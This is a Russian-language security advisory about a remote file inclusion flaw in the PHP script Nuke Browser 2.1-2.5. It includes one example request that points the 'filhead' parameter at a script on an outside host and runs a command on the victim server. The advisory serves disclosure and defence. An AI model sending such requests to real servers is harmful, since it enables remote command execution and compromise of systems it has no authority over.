Выполнение произвольных команд в Nuke Browser

Дата публикации:
06.02.2003
Всего просмотров:
757
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость включения файла обнаружена в Nuke Browser (lophas.phpwebhosting.com/nukebrowser.php). Удаленный пользователь может выполнить произвольные команды на уязвимом сервере.

Удаленный атакующий может включить удаленно расположенный сценарий, указанный в переменной '$filhead', который будет выполнен на уязвимом сервере. Пример:

http://[victim]/nukebrowser.php?filnavn=http://[anysite]&filhead=http://[webhosting]/cmd.txt&cmd=id
Уязвимость обнаружена в Nuke Browser 2.1-2.5

Ссылки: Nukebrowser bug
или введите имя

CAPTCHA